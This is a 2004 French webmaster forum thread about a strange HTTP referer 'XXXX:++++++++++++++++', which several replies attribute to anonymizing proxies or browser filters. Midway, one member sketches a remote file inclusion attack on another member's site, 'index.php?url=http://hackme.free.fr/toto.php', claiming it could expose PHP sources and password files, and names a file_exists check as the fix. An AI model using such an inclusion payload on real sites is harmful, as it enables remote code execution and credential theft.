provenance XXXX:++++++++++++++++

Consultez la formation au REFERENCEMENT naturel Google de WebRankInfo / Ranking Metrics


sietjp
WRInaute impliqué
WRInaute impliqué
 
Messages: 624
Inscription: 14 Déc 2003

provenance XXXX:++++++++++++++++

Message le Dim Jan 25, 2004 13:35

Bonjour,
Depuis une semaine , j'ai vu arriver 2 fois sur la page d'acceuil de mon site un internaute dont l'http referer est "XXXX:++++++++++++++++" au lieu de l'habituel http ://www . site . com/sdfjkl

j'ai bien fait ma recherche dans webrankinfo comme un bon petit gars qui commence à comprendre comment ça se passe mais je n'ai pas trouvé, peut être avez vous déjà vu ça?

fredsoft
WRInaute discret
WRInaute discret
 
Messages: 242
Inscription: 26 Jan 2003

Message le Dim Jan 25, 2004 13:46

on puex écrire facilement referer en php....


DAVID86
WRInaute passionné
WRInaute passionné
 
Messages: 1181
Inscription: 15 Oct 2003

Message le Dim Jan 25, 2004 14:00

un ptit jeune qui voulait jouer au "hacker" certainement

fredsoft
WRInaute discret
WRInaute discret
 
Messages: 242
Inscription: 26 Jan 2003

Message le Dim Jan 25, 2004 14:37

ou un bots developpé a la carte

parce que te hacker pas spécialement dur :

http://www.observatoire-environnement.o ... l=toto.htm

avec cette faille on peux lister tes sources php et autre fichiers de passwords


DAVID86
WRInaute passionné
WRInaute passionné
 
Messages: 1181
Inscription: 15 Oct 2003

Message le Dim Jan 25, 2004 14:51

le fichier de password? comment veux tu faire ça?? :)

Et même éditer les sources.... la, tu m'impressionnes 8O :D

fredsoft
WRInaute discret
WRInaute discret
 
Messages: 242
Inscription: 26 Jan 2003

Message le Dim Jan 25, 2004 15:49

ton script permet d'envoyer du code a distance en faisant un truc du genre index.php?url=http://hackme.free.fr/toto.php par exemple

suiffit que toto.php renvoie ce qu'il faut pour lister les sources..donc les fichiers de password

Eservice
WRInaute passionné
WRInaute passionné
 
Messages: 1463
Inscription: 18 Sep 2002

Re: provenance XXXX:++++++++++++++++

Message le Dim Jan 25, 2004 15:49

sietjp a écrit:peut être avez vous déjà vu ça?
Bonjour,

oui certains internautes utilisent un filtre Web qui mouline tout ce qui entre et sort de leur navigateur (variable HTTP, javascript, cookies).


Dans ce cas c'est le referer qui est remplacé par n'importe quoi. Ca ne sert à rien à part gêner le suivi d'audience des webmestres. C'est de la paranoïa pure et simple.


DAVID86
WRInaute passionné
WRInaute passionné
 
Messages: 1181
Inscription: 15 Oct 2003

Message le Dim Jan 25, 2004 15:59

fredsoft a écrit:ton script permet d'envoyer du code a distance en faisant un truc du genre index.php?url=http://hackme.free.fr/toto.php par exemple

suiffit que toto.php renvoie ce qu'il faut pour lister les sources..donc les fichiers de password

non car les chaines de caractères sont validées, et même en essayant des commandes simples, ça bloque . je connaissais cette combine. Mais peut être en as tu une de spéciale?

fredsoft
WRInaute discret
WRInaute discret
 
Messages: 242
Inscription: 26 Jan 2003

Message le Dim Jan 25, 2004 16:23

je pense pas que tu connaisses la combine sinon tu aurais fait la parade gloable la plus simple pour ce genre de faille le test file_exists. J'ai pas testé plus sinon..donc je n'affirme rien...juste qu'il y une possibilité


DAVID86
WRInaute passionné
WRInaute passionné
 
Messages: 1181
Inscription: 15 Oct 2003

Message le Dim Jan 25, 2004 16:30

:D

Mitirapa
WRInaute passionné
WRInaute passionné
 
Messages: 1657
Inscription: 10 Juil 2002

Message le Dim Jan 25, 2004 18:09

oui provenance XXXX:++++++++++++++++ c'est les logiciels de surf anonymes ou les passerelles sur le web pour surfer anonymes...


yannouk
WRInaute passionné
WRInaute passionné
 
Messages: 2142
Inscription: 11 Oct 2003

Message le Dim Jan 25, 2004 23:25

david j'ai un peu trainé dans le monde du hacking si tu as besoin d'aide pour boucher la faille n'hesite pas.


Si vous avez aimé cette discussion, partagez-la sur vos réseaux sociaux préférés :

Formation recommandée sur ce thème :

Formation REFERENCEMENT naturel Google : apprenez une méthode efficace pour optimiser à fond le référencement naturel dans Google de façon durable... Formation animée par Olivier Duffez et Fabien Facériès, experts en référencement naturel.

Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.

Lectures recommandées sur ce thème :



Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 0 invités